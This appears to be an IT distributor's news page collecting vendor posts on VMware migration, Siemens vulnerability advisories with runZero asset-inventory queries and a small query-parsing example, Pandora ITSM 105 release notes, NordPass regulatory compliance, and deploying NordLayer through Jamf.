Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Modernized VMware Migration: How Scale Computing Eases the Move

Scale Computing Executive Spotlight: VMware Migration

Migrating away from VMware can seem overwhelming, with fears of complexity and downtime creating uncertainty about where to start and how to proceed. But it doesn’t have to be that way. In our latest video, Scale Computing CEO Jeff Ready explains how our entire team has spent years perfecting the migration process, ensuring that customers enjoy a smoother, simpler path to IT modernization.

For many organizations, the first hurdle in considering a VMware alternative is the migration process itself. Will it integrate with our existing infrastructure and tools? What about the ecosystem of backup and security software tied to VMware? As Jeff explains, Scale Computing has been tackling these challenges for years, long before Broadcom’s acquisition of VMware. Armed with the right tools and the infrastructure experts at the ready to ensure a seamless and efficient transition, we’re here to help guide you through every step of your migration journey.

Scale Computing’s tailored approach ensures that each migration is optimized for each customer’s unique environment. Jeff further explains how Scale Computing leverages a diverse set of tools and methodologies across a broad spectrum of use cases to successfully migrate practically every type of application from VMware to the SC//Platform. The collective expertise of our team ensures that our customers and partners can be fully confident that their workloads will transition smoothly and that their IT systems will remain resilient both during and after the move.

However, what really makes Scale Computing stand out from the crowd isn’t just our migration expertise, but SC//Platform itself. Unlike VMware, which was developed decades ago, Scale Computing continues to actively invest in the latest groundbreaking automation and AI technologies into its solutions. As one of the top five VMware alternatives recommended by DCIG, Scale Computing offers not just a replacement but a significant upgrade that enables organizations to reduce complexity, enhance performance, and future-proof their IT operations.

If you’ve been considering moving away from VMware but are wary of the potential complications, it’s time to rethink what’s possible. Watch the full video to hear Jeff explain how Scale Computing delivers a seamless, stress-free migration experience and why we’re recognized as a leader in VMware alternatives.

About Scale Computing
Scale Computing is a leader in edge computing, virtualization, and hyperconverged solutions. Scale Computing HC3 software eliminates the need for traditional virtualization software, disaster recovery software, servers, and shared storage, replacing these with a fully integrated, highly available system for running applications. Using patented HyperCore™ technology, the HC3 self-healing platform automatically identifies, mitigates, and corrects infrastructure problems in real-time, enabling applications to achieve maximum uptime. When ease-of-use, high availability, and TCO matter, Scale Computing HC3 is the ideal infrastructure platform. Read what our customers have to say on Gartner Peer Insights, Spiceworks, TechValidate and TrustRadius.


How to find Siemens devices on your network

Multiple vulnerabilities (February 2025)

Siemens disclosed multiple vulnerabilities in various product lines:

  • SSA-111547 – cleartext storage of sensitive information in SIPROTEC 5 (CVSS score 5.1)
  • SSA-195895 – user enumeration vulnerability in the web server of SIMATIC Products (CVSS score 6.9)
  • SSA-224824 – denial of service vulnerabilities in SIMATIC S7-1200 CPU Family before V4.7 (CVSS score 8.7)
  • SSA-246355 – multiple vulnerabilities in Tableau Server Component of Opcenter Intelligence before V2501 (CVSS score 10.0)
  • SSA-342348 – insufficient session expiration vulnerability in Siemens SIMATIC PCS neo, TIA Administrator, and TIA Portal (CVSS score 8.7)
  • SSA-687955 – accessible development shell via physical interface in SIPROTEC 5 (CVSS score 7.0)
  • SSA-698820 – multiple vulnerabilities in FortiGate NGFW before V7.4.4 on RUGGEDCOM APE1808 devices (CVSS score 9.0)
  • SSA-767615 – information disclosure via SNMP in SIPROTEC 5 devices (CVSS score 8.7)
  • SSA-769027 – multiple vulnerabilities in SCALANCE W700 IEEE 802.11ax devices before V3.0.0 (CVSS score 8.6)
  • SSA-770770 – multiple vulnerabilities in FortiGate NGFW before V7.4.5 on RUGGEDCOM APE1808 devices (CVSS score 7.5)

What is the impact?

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions, disclosure of sensitive information, or access to the underlying filesystem.

Are updates or workarounds available?

For the disclosed vulnerabilities, Siemens has released updates or patches. Siemens recommends that access is restricted to trusted sources. Refer to Siemens’ website for more information about their operational guideline recommendation.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:"SCALANCE M8" OR hw:"SIMATIC" OR hw:"RUGGEDCOM" OR hw:"SCALANCE"

Ten vulnerabilities disclosed in Siemens products (December 2024)

Siemens disclosed ten vulnerabilities in a variety of Siemens products, including their RUGGEDCOM, SENTRON, and other product lines. These vulnerabilities have CVSS scores that range from 5.1 (moderate) to 8.6 (high). For the most critical vulnerabilities, unauthenticated remote attackers could perform unauthorized administrative actions if they are able to get a local user to click on a malicious link. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions or disclosure of sensitive information. Siemens has released patches for these vulnerabilities. Siemens also recommends that all systems be kept behind firewalls and have unnecessary services disabled.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

vendor:Siemens

Multiple vulnerabilities (November 2024)

Siemens disclosed multiple vulnerabilities in various product lines:

  • SSA-354112 – multiple vulnerabilities in SCALANCE M-800 Family devices (CVSS score 8.6)
  • SSA-654798 – unauthenticated remote access to the filesystem in SIMATIC CP devices (CVSS score 8.7)
  • SSA-454789 – deserialization of untrusted data in TeleControl Server (CVSS score 10.0)

What is the impact?

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions, disclosure of sensitive information, or access to the underlying filesystem.

Are updates or workarounds available?

For the disclosed vulnerabilities, Siemens has released updates or patches. Siemens recommends that access is restricted to trusted sources. Refer to Siemens’ website for more information about their operational guideline recommendation.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:"SCALANCE M8" OR hw:"SCALANCE S615" OR hw:"SIMATIC CP" OR (os:"Windows" AND tcp_port:26865)

35 vulnerabilities (September 2024)

Siemens disclosed 35 vulnerabilities in a variety of Siemens products, including their LOGO!, SIMATIC, SINEMA, and other product lines. These vulnerabilities have CVSS scores that range from 4.3 (moderate) to 10 (extremely critical). The most critical vulnerabilities disclosed include:

  • SSA-955858 – multiple vulnerabilities in LOGO! 8 BM devices (CVSS score 9.8)
  • SSA-832273 – multiple vulnerabilities in RUGGEDCOM devices (CVSS score 9.8)
  • SSA-721642 – multiple vulnerabilities in SCALANCE devices (CVSS score 9.1)
  • SSA-673996 – multiple vulnerabilities in SICAM and SITIPE devices (CVSS score 8.2)
  • SSA-629254 – remote code execution vulnerability in SIMATIC SCADA and PCS 7 systems (CVSS score 9.1)
  • SSA-455250 – multiple vulnerabilities in RUGGEDCOM devices (CVSS score 9.8)
  • SSA-039007 – heap-based buffer overflow in the Siemens User Management Console component (CVSS score 9.8)

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions or disclosure of sensitive information. For most of the disclosed vulnerabilities, Siemens has released updates or patches. However, some of the vulnerabilities listed above, including some critical ones, do not yet have patches, and it is unclear when such updates will be available. Siemens recommends that all systems be kept behind firewalls and have unnecessary services disabled.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

vendor:Siemens

SCALANCE and RUGGEDCOM products (August 2024)

Siemens disclosed multiple vulnerabilities for a variety of products and devices, including the SCALANCE and RUGGEDCOM product lines.

  • CVE-2024-41976 is rated high, with a CVSS score of 7.2, and allows an authenticated attacker to execute arbitrary code by submitting invalid VPN configuration data.
  • CVE-2024-41977 is rated high, with a CVSS score of 7.1, and allows an attacker to escalate their privileges because affected devices do not properly enforce user session isolation.
  • CVE-2024-41978 is rated high, with a CVSS score of 6.5, and allows an authenticated attacker to forge 2FA tokens of other users because affected devices store sensitive 2FA information in log files on disk.
  • CVE-2024-44321 is rated medium, with a CVSS score of 2.7, and allows an unauthenticated attacker to cause a denial of service by sending large input data.

Successful exploitation of these vulnerabilities would allow an authenticated attacker to remotely execute code, escalate their privileges, or forge other users' credentials. The first three require the attacker to be authenticated before they can be exploited.

The last vulnerability has the lowest score, but the device would still need to be restarted if the denial-of-service condition were triggered.

Siemens recommends upgrading all affected devices to firmware V8.1 or later. Additionally, users should ensure these devices are isolated in their own networks to prevent unwanted network traffic to the device.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

hw:"RUGGEDCOM" OR hw:"SCALANCE" OR hw:"LOGO"

CVE-2024-35292 – SIMATIC S7-200 SMART Devices (July 2024)

In July 2024, Siemens disclosed a vulnerability in their SIMATIC S7-200 SMART Devices.

CVE-2024-35292 is rated high, with a CVSS score of 8.2. Affected devices generate predictable IP ID sequence numbers, which an attacker could use as the basis of an attack that ultimately creates a denial-of-service condition. The only workaround was to restrict access to the network where the affected products were located by introducing strict access control mechanisms.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:SIMATIC

SENTRON, SCALANCE, and RUGGEDCOM vulnerabilities (March 2024)

In March 2024, Siemens released security advisories for a variety of products and devices, including the SENTRON, SCALANCE, and RUGGEDCOM product lines.

Several of the vulnerabilities had CVSS scores in the 7.0 to 8.9 range (high) and several more in the 9.0 to 10.0 range (critical).

For the full list of vulnerabilities, you can consult Siemens ProductCERT.

Several of these vulnerabilities allowed for unauthenticated remote code execution, allowing for compromise of the vulnerable systems. Other vulnerabilities could lead to privilege escalation, information disclosure, or denial of service. Users were urged to upgrade as quickly as possible. Siemens released updates via a variety of channels. See Siemens ProductCERT for details.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate Siemens assets that were potentially vulnerable:

hardware:Siemens OR hardware:RuggedCom
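
The queries in this post share one small grammar: field:value terms, quoted values, AND, OR, and parentheses. The following Python evaluator, added here as an example and not runZero's own search engine, runs each of those queries against a constructed inventory so you can check what a query would and would not match before relying on it. Its semantics are assumptions made for this example, not documented runZero behaviour: string fields (hw, hardware, vendor, os) match by case-insensitive substring, hardware is treated as an alias of hw, tcp_port:N matches an asset with port N open, AND binds tighter than OR, and adjacent terms are AND-ed. The hostnames, models and ports in the inventory are made up.

```python
"""Local evaluator for the asset-inventory query shapes shown in this post.

Added example; not runZero's search engine, only an approximation of its
query syntax. Assumed semantics (not from the page): a term is field:value
or field:"quoted value"; string fields (hw, hardware, vendor, os) match by
case-insensitive substring; hardware is an alias of hw; tcp_port:N matches
an asset with port N open; AND binds tighter than OR; adjacent terms are
AND-ed; parentheses group. The inventory below is constructed.
"""
import re
from typing import Any, Dict, List, Optional, Tuple

Asset = Dict[str, Any]
Node = Tuple[Any, ...]

# One token per match: '(' , ')', field:"quoted value", field:value, AND, OR
TOKEN_RE = re.compile(r'\s*(\(|\)|[A-Za-z_]+:"[^"]*"|[A-Za-z_]+:[^\s()]+|AND|OR)')


def tokenize(query: str) -> List[str]:
    """Split a query into terms, operators and parentheses."""
    tokens, pos, query = [], 0, query.rstrip()
    while pos < len(query):
        match = TOKEN_RE.match(query, pos)
        if not match:
            raise ValueError(f"cannot parse query near {query[pos:]!r}")
        tokens.append(match.group(1))
        pos = match.end()
    return tokens


class QueryParser:
    """Recursive-descent parser: OR < AND < term, with parentheses."""

    def __init__(self, tokens: List[str]) -> None:
        self.tokens, self.pos = tokens, 0

    def peek(self) -> Optional[str]:
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def take(self) -> Optional[str]:
        tok = self.peek()
        self.pos += 1
        return tok

    def parse(self) -> Node:
        node = self.parse_or()
        if self.peek() is not None:
            raise ValueError(f"unexpected token {self.peek()!r}")
        return node

    def parse_or(self) -> Node:
        node = self.parse_and()
        while self.peek() == "OR":
            self.take()
            node = ("or", node, self.parse_and())
        return node

    def parse_and(self) -> Node:
        node = self.parse_term()
        while self.peek() not in (None, "OR", ")"):   # explicit or implicit AND
            if self.peek() == "AND":
                self.take()
            node = ("and", node, self.parse_term())
        return node

    def parse_term(self) -> Node:
        tok = self.take()
        if tok == "(":
            node = self.parse_or()
            if self.take() != ")":
                raise ValueError("missing closing parenthesis")
            return node
        if tok is None or ":" not in tok:
            raise ValueError(f"expected field:value, got {tok!r}")
        field, value = tok.split(":", 1)
        return ("term", field.lower(), value.strip('"'))


def term_matches(asset: Asset, field: str, value: str) -> bool:
    """Assumed matching rules for one field:value term (see module docstring)."""
    if field == "hardware":
        field = "hw"
    if field == "tcp_port":
        return int(value) in asset.get("tcp_ports", [])
    actual = asset.get(field)
    return actual is not None and value.lower() in str(actual).lower()


def evaluate(node: Node, asset: Asset) -> bool:
    if node[0] == "term":
        return term_matches(asset, node[1], node[2])
    if node[0] == "and":
        return evaluate(node[1], asset) and evaluate(node[2], asset)
    return evaluate(node[1], asset) or evaluate(node[2], asset)


def search(assets: List[Asset], query: str) -> List[str]:
    """Names of the assets matching the query, in inventory order."""
    tree = QueryParser(tokenize(query)).parse()
    return [a["name"] for a in assets if evaluate(tree, a)]


# Constructed inventory: names, models and open ports are made up.
INVENTORY: List[Asset] = [
    {"name": "plc-01", "vendor": "Siemens", "hw": "Siemens SIMATIC S7-1200", "os": "SIMATIC S7", "tcp_ports": [102]},
    {"name": "rtr-01", "vendor": "Siemens", "hw": "Siemens SCALANCE M874", "os": "SCALANCE OS", "tcp_ports": [22, 443]},
    {"name": "fw-01", "vendor": "Siemens", "hw": "Siemens RUGGEDCOM APE1808", "os": "FortiOS", "tcp_ports": [443]},
    {"name": "tcs-01", "vendor": "Dell", "hw": "Dell PowerEdge R650", "os": "Windows Server 2019", "tcp_ports": [3389, 26865]},
    {"name": "ws-05", "vendor": "Dell", "hw": "Dell OptiPlex 7090", "os": "Windows 11", "tcp_ports": [3389]},
]

if __name__ == "__main__":
    for q in ('hw:"SCALANCE M8" OR hw:"SIMATIC" OR hw:"RUGGEDCOM" OR hw:"SCALANCE"',
              'vendor:Siemens',
              'hw:"SCALANCE M8" OR hw:"SCALANCE S615" OR hw:"SIMATIC CP" OR (os:"Windows" AND tcp_port:26865)',
              'hardware:Siemens OR hardware:RuggedCom'):
        print(q, "->", search(INVENTORY, q))
```

Running it shows the trade-off between the broad and narrow queries above: vendor:Siemens returns every Siemens asset, while a model-specific term such as hw:"SIMATIC CP" misses the S7-1200, and the November query's (os:"Windows" AND tcp_port:26865) branch is what picks up the TeleControl server host. When an advisory spans several product lines, start with the broad query and narrow it once you know which models are present.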

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.


Pandora ITSM 105: New Tools for More Efficient IT Management

With the new Pandora ITSM version 105, you now have features designed to improve your workflow and optimize ticket and project management.
Key Enhancements in Pandora ITSM 105

New Filtering System

You can now filter and view results more efficiently in Tickets, Users, Project Board, Contracts, and Invoices. This system will expand to more sections in future versions, allowing for greater flexibility in daily management.

Enhanced Ticket View

The layout of fields in tickets has been reorganized to improve visibility and ease of use. Additionally, a new contracts section has been included to streamline access to relevant information, ensuring a better user experience.

Customizable Ticket Design

You can now rearrange, add, or remove fields in the ticket view according to your needs, with real-time editable settings through the new filters. This flexibility allows each team to tailor Pandora ITSM to their specific workflow.

Mobile Timetracker Optimization

The mobile version of the timetracker has been redesigned to be more intuitive and functional. All options available in the web console have been incorporated, ensuring that users can efficiently manage their time anytime and from any device.

ChatGPT Support in Chat

ChatGPT has been integrated into Pandora ITSM’s chat feature, providing quick and accurate responses to technical or support inquiries. This integration enhances user assistance and facilitates real-time issue resolution.

Tags in Tickets and Projects

It is now possible to add tags to tickets and projects, making it easier to categorize and search for relevant information. This feature allows for quicker access to work items and improves internal organization.

New Project Management View

With a visual interface similar to Trello, this new view simplifies task and project management with tags, custom statuses, and greater organizational flexibility. Additionally, it enables easy task movement between columns for more dynamic tracking.

New Workflow for Timetracker

The timetracker workflow has been optimized, allowing the configuration of alerts and automated reminders to improve workday tracking. It is now possible to schedule notifications that warn about work-hour limits or forgotten check-ins.

Improvements in Management and Security

New Licensing System

Starting with this version, clients who update will need to request a new license through the Warp Update > License menu. This change ensures greater security and control over active licenses on the platform.

Database Update

To optimize performance and compatibility, upgrading to Pandora ITSM 105 requires migrating from MySQL 5 to MySQL 8. This update ensures greater stability and performance in data management, improving the overall operation of the platform. Refer to the official documentation for more details.

Other Improvements and Fixes

  • A new notification section has been added for super administrators.
  • Enhancements in data export and report customization.
  • Optimized interface for work unit management.
  • Updated integration with third-party systems for better compatibility.

Explore all the new features of Pandora ITSM 105 and optimize your team’s management.

Visit our official Wiki or check the technical documentation for more details on this version.


About PandoraFMS
Pandora FMS is a flexible monitoring system, capable of monitoring devices, infrastructures, applications, services and business processes.
Of course, one of the things that Pandora FMS can control is the hard disks of your computers.

Regulatory Compliance and NordPass

What is regulatory compliance?

Regulatory compliance refers to various processes and procedures of adhering to the laws, regulations, and standards set by various governing bodies. The regulations can come from numerous sources such as local, state, federal, or even international agencies, industry groups, and professional associations. The intention behind various regulatory compliance is to protect consumers and other stakeholders.

Importance of regulatory compliance

The aim of regulatory compliance is to make sure that businesses and organizations operate in a secure, responsible, and ethical manner. Regulatory compliance can also provide businesses and organizations with a competitive advantage by helping to create a culture of transparency and credibility with customers, employees, and other involved parties. Furthermore, adhering to regulatory compliance can improve internal processes, risk management procedures, and mitigate potential legal issues, which in turn lays a great foundation for a sustainable organization.

However, it’s critical to remember that most regulatory compliance is mandatory. Failing to comply with any of the mandatory regulations can result in hefty fines. For instance, LinkedIn Ireland has been fined more than $300 million by the Irish Data Protection Commission (DPC) for violation of the General Data Protection Regulation (GDPR). Meta, the company formerly known as Facebook, was also recently fined over $250 million by the Irish DPC for a security breach that exposed the sensitive data of over 28 million users worldwide.

Besides financial losses, non-compliance can cause major damage to the organization’s reputation as clients may lose trust in the organization. This can even lead to serious legal issues.

Below are some of the most common regulatory compliance standards.

National Institute of Standards and Technology (NIST)

The National Institute of Standards and Technology (NIST) is a US federal agency that develops technology, metrics, and standards to drive innovation and ensure operational security within a business environment. NIST compliance is mandatory for all US-based federal information systems except those related to national security. However, the standard can be adopted by any organization.

To be NIST-compliant, a company needs to implement access controls to limit the risk of unauthorized access, develop a comprehensive incident response plan, and devise audit procedures and schedules.

General Data Protection Regulation (GDPR)

The General Data Protection Regulation (GDPR) is a data protection law that applies to businesses and organizations operating within the European Union (EU) and the European Economic Area (EEA). It sets out rules for how organizations can collect, use, and store personal data, and provides individuals the right to access and control their personal data.

To adhere to the GDPR, organizations and businesses need to implement measures such as obtaining consent from individuals before collecting their data, providing clear and concise information about their data collection practices, and implementing appropriate security measures to protect personal data.

Health Insurance Portability and Accountability Act (HIPAA)

The Health Insurance Portability and Accountability Act (HIPAA) is a US law that sets out standards for the protection of personal health information. The law applies to healthcare providers and all other entities that handle personal health information in the US.

To meet the requirements set out by the HIPAA, organizations need to implement secure systems for storing and transmitting personal health information, providing training to employees on HIPAA requirements, and implementing access controls to prevent unauthorized access to personal health information.

Payment Card Industry Data Security Standard (PCI DSS)

The Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards that apply internationally to organizations that handle credit card transactions. The regulatory standard sets out requirements for protecting cardholder data and preventing unauthorized access to such data.

The PCI DSS regulations require businesses and organizations that process payment card information to implement secure systems for storing and transmitting cardholder data, conduct regular security assessments, and implement further security controls to prevent unauthorized access to cardholder data.

ISO/IEC 27001

The ISO/IEC 27001 is an international standard that outlines best practices for an information security management system (ISMS). The standard has been developed to help organizations protect their information assets and manage risks related to information security. The ISO/IEC 27001 is not a mandatory requirement.

To meet the ISO/IEC 27001 compliance, organizations need to conduct regular risk assessments, implement controls to protect against unauthorized access, and regularly review and update their information security management systems.

California Consumer Privacy Act (CCPA)

The California Consumer Privacy Act (CCPA) is a privacy law that in many ways mimics its European counterpart — the GDPR. However, the CCPA applies to businesses operating in California and it provides California residents with the right to access and control their personal data, and imposes certain requirements on businesses that collect and handle personal data.

For an organization to be CCPA compliant, it needs to implement security measures to protect customer data. Furthermore, companies are also required to provide clear and concise information about data collection practices, allowing California residents to request access to and deletion of their personal data.

Gramm-Leach-Bliley Act (GLBA)

The Gramm-Leach-Bliley Act (GLBA) is a US law that applies to financial institutions within the US. Like many of the regulatory compliance standards we already discussed, GLBA requires financial institutions to implement safeguards that would protect personal information as well as to disclose their data collection and sharing practices to customers.

To comply with the GLBA regulatory standards, financial institutions may need to implement secure systems for storing and transmitting personal financial information, providing customers with information about their data collection and sharing practices, and implementing access controls to prevent unauthorized access to personal financial information.

Center for Internet Security (CIS)

The Center for Internet Security (CIS) is a nonprofit organization that provides cybersecurity guidance and best practices to help organizations protect their systems and data. The CIS comprises 18 Critical Security Controls for identifying and protecting against the most common cyber threats.

To be CIS compliant, companies and organizations need to establish a comprehensive cybersecurity perimeter to ensure protection of their data and information management systems.

For a detailed guide on how NordPass can ease compliance with CIS controls, make use of our comprehensive CIS compliance guide.

Opinion 498

The Formal Opinion 498 outlined by the American Bar Association (ABA) provides guidance for US-based lawyers and law firms with regard to virtual practice. While the ABA Model Rules of Professional Conduct permit virtual practice, the Formal Opinion 498 provides an additional set of guidelines for virtual practice.

To follow the guidelines set out by the Opinion 498, organizations or individuals are urged to establish secure information management systems and protect them with complex passwords to ensure secure storage and access to client data.

Agence nationale de la sécurité des systèmes d’information (ANSSI)

ANSSI compliance combines a set of security standards set by the French National Cybersecurity Agency. The ANSSI has been developed as a regulatory standard in France to protect sensitive information and systems from cyber threats such as hacking, malware, and data breaches. Companies that store and handle sensitive information may be required to comply with the ANSSI standards in order to ensure the security of that information.

Compliance with the ANSSI standards may involve regular audits, penetration testing, and other security measures to identify and address vulnerabilities in a company’s systems.

Network and Information Security Directive 2 (NIS2)

The Network and Information Security Directive 2 (NIS2) is an updated cybersecurity directive issued by the European Union to make the critical sectors like energy, healthcare, finance, and digital infrastructure more resilient. The updated directive extends the scope of cybersecurity obligations for organizations through enhanced risk management measures, incident reporting procedures, and supply chain security. More specifically, under the NIS2, organizations are expected to implement security measures, conduct periodic cybersecurity training sessions, and introduce a stricter timeframe for reporting security incidents.

Digital Operational Resilience Act (DORA)

The Digital Operational Resilience Act (DORA) is an EU regulation developed to help raise the cyber resilience of financial institutions, such as banks, insurance companies, and investment firms. DORA provides a framework for managing IT risks by requiring organizations to adopt tight security controls, regularly assess their cybersecurity posture, and ensure that third-party vendors are in compliance with resilience standards. The regulation also dictates detailed incident reporting and response mechanisms to improve the financial sector’s resilience to cyber threats.

How can NordPass help with regulatory compliance?

Meeting regulations and staying compliant can be a complex and time-consuming process, as businesses and organizations must stay up-to-date with the latest regulatory requirements and implement appropriate policies, procedures, and tools.

However, with the right tools at your disposal, compliance can be less of a hassle than you might think. One such tool is NordPass — a secure and easy-to-use password manager designed for business use that can help your organization comply with the security guidelines and requirements outlined in the regulatory compliance standards listed above. But how exactly can it help?

Strong passwords and secure password storage

Most regulatory compliance standards require organizations to implement some sort of security measures to limit the possibility of unauthorized access.

For instance, PCI DSS, GLBA, GDPR, and CIS Controls all have outlined guidelines for ensuring the security of personal data processing and storage.

This is where NordPass comes in as a tool that can help. Designed around the principles of zero-knowledge architecture and equipped with the XChaCha20 encryption algorithm, NordPass offers a secure way to store and access business passwords and other sensitive information in line with regulatory requirements.

Password Policy — a NordPass feature — can also play a critical role in compliance. Using Password Policy, companies can set certain specifications for password complexity for the entire organization, which can significantly fortify the overall security of the organization.

To easily follow Password Policy rules and specifications, users can use our very own Password Generator — a tool that can generate a password adhering to all the specifications outlined in the Password Policy in just a few clicks.

On top of that, NordPass can ensure that all of your organization’s passwords are stored securely and in line with the regulatory requirements.

Secure access management

Some compliance standards require organizations to implement secure access management solutions. For example, this is the case with ANSSI compliance as well as with HIPAA and NIST.

Here NordPass and its Admin Panel can play a major role, because the panel is designed to provide organizations with a way to effectively and easily manage access privileges across the entire organization.

Via the Admin Panel, solution Owners and Admins can grant or revoke access to systems as well as monitor member activity within the organization. The Admin Panel is also the place where you can set the Password Policy for the organization, ensuring that passwords throughout the company adhere to certain specifications.

Additionally, NordPass comes equipped with a feature called Activity Log, which allows organization Admins to review user actions such as system access and item sharing. For advanced monitoring and security analysis, NordPass integrates directly with Splunk. Organizations that use other Security Information and Event Management (SIEM) solutions can still transfer or audit the logs by exporting them in JSON format.

Sharing Hub is another integral feature that provides organization Owners with a detailed overview of all shared items and folders within the organization. Leveraging the Sharing Hub, Owners get details on who shared what and with whom, ensuring transparency and oversight of data.

Breach Monitoring

Regulatory compliance standards also tend to outline best practices for responding to a security incident such as a data breach. This is explicitly outlined in Article 33 of the GDPR, which states that a personal data breach should be reported to the supervisory authority within 72 hours. Failing to do so may result in a fine of 10 million or 2% of annual revenue.

NordPass is equipped with a Data Breach Scanner — a tool that can scan the company’s entire list of domains for potential breaches. Because the Data Breach Scanner issues a notification to all members of the organization, a company potentially affected by a breach can act quickly and efficiently to contain it.

The NordPass Password Health tool can help you detect weak, old, or reused passwords throughout the organization and significantly reduce the risk of unauthorized access. On top of that, NordPass offers the Exposed Passwords feature, which checks your organization’s saved passwords against a database of known compromised credentials found on the dark web. If any of the passwords have been leaked in a breach, the Exposed Passwords feature will notify you, allowing you to promptly update them to maintain proper account security.

Bottom line

These days, regulatory compliance is an inseparable part of running a business. Fail to comply and be ready to face hefty fines and serious reputational damage. However, compliance is never easy. But with the right tools at your disposal, the whole process can be a lot smoother.

NordPass can be a tool to assist organizations in meeting various requirements in an easier and more efficient way. By staying compliant, organizations can not only avoid costly fines and legal issues, but also gain a competitive advantage by building a culture of transparency and credibility with their customer base or investors.

About NordPass
NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas, including cyber security, cloud, data protection, endpoints, infrastructure, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, points of sale, resellers, and partner companies, Version 2 offers quality products and services that are highly acclaimed in the market. Its customers cover a wide spectrum that includes Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, government, a vast number of successful SMEs, and consumers in various Asian cities.

Technology scalability & simplified app management on Apple devices

Summary: Jamf makes it simple to manage the NordLayer app on Apple devices, giving teams the flexibility to grow—without the usual IT headaches.

As businesses grow, so do their tech needs. More people, more devices, and more locations mean IT teams have to keep everything secure and running smoothly without slowing anyone down. For remote-first companies, that challenge is even bigger. Managing security and apps at scale can feel overwhelming, like juggling too many balls at once.

That’s where smart integrations, like Jamf and NordLayer, come in. Jamf makes it easy to manage the NordLayer app on Apple devices, giving teams the flexibility to grow without the usual IT headaches. This means your business can scale efficiently while keeping security tight and IT workloads manageable.

In this article, we’ll examine why technology scalability matters, the challenges of managing security at scale, and how NordLayer and Jamf collaborate to make it easier.

Technology scalability in IT and security

Technology scalability is the ability to expand your IT setup without compromising on performance or security. As companies grow, so does the need for flexible, secure solutions that work across remote and hybrid teams.

For remote-first or hybrid teams, scalability means easy access to tools, the ability to manage security from anywhere, and the flexibility to adapt to changing needs. It also ensures smooth collaboration across different locations. However, growth brings challenges, particularly in terms of security and managing an increased number of devices.

In short, IT scalability is about staying flexible, adapting to change, and maintaining strong security as your business grows.

Challenges of managing security at scale

We’ve already mentioned that when a business grows, so do the complexities of managing technologies. An increasing number of people, devices, and locations adds to the IT teams’ plate. The pressure is on to keep everything secure and running smoothly. For remote-first companies, it’s even trickier. Securing apps and devices at scale can quickly become overwhelming.

For teams scaling quickly, the challenge is onboarding and offboarding employees across multiple devices. IT teams need to keep security consistent across Apple devices, ensure compliance, and stay on top of updates without constantly doing it manually. On top of that, finding the right balance between strong security and a smooth experience for both IT teams and employees adds complexity.

These challenges show why automated solutions are key. They simplify device management and improve security without adding more work. With streamlined processes, businesses can grow faster while keeping everything secure.

How Jamf simplifies NordLayer app management on Apple devices

Managing security shouldn’t feel like a chore. Yet, for many IT managers, keeping apps updated and configured across Apple devices is an endless loop of manual work. That’s where Jamf, a leader in Apple mobile device management (MDM), and NordLayer step in, offering a seamless, automated solution that cuts the hassle and boosts security.

IT teams need tools that operate in the background rather than adding extra work. The Jamf integration with NordLayer makes security effortless, keeping Apple devices protected without IT constantly stepping in.

Managing NordLayer is simple with Jamf Cloud. Here’s what centralized distribution through Jamf gives you:

  • Automated deployment: Roll out NordLayer to all Apple devices in a few clicks without complex setup.
  • Automatic updates: Ensure devices always have the latest security features, with no manual updates needed.
  • Security policy enforcement: Keep NordLayer security policies in place automatically, reducing compliance risks.
  • Centralized management with NordLayer’s Control Panel: Easily handle deployments and security updates of all Apple devices from one dashboard.

This automated approach enables IT teams to work smarter, spending less time on NordLayer app management and more on strategic priorities.

“As more businesses rely on Apple devices, security needs to be both strong and simple. The NordLayer and Jamf integration delivers just that—seamless protection without extra complexity,” says Artūras Bubokas, Product Manager at NordLayer.

Benefits of using Jamf and NordLayer

By combining Jamf’s seamless Apple device management with NordLayer’s strong network security, businesses get an automated, hassle-free solution. The result? Stronger security, less manual work, and more time for IT teams to focus on what truly matters.

Stronger network security, less hassle

Now, let’s break down the key benefits of this integration.

  • Saves IT time: Cuts down on manual configuration and troubleshooting
  • Boosts security: Ensures consistent, up-to-date security across Apple devices
  • Reduces costs: Lowers IT overhead with automated management
  • Improves user experience: Integrates security seamlessly without disrupting workflows
  • Supports growth: Scales easily as teams and devices expand

How to deploy NordLayer via Jamf

Here is how you can set up NordLayer on Apple devices in a few steps:

  • Download the NordLayer package (.pkg for macOS, App Store link for iOS)
  • Upload it to the Jamf Cloud and configure policies
  • Automate installation and updates for all Apple devices
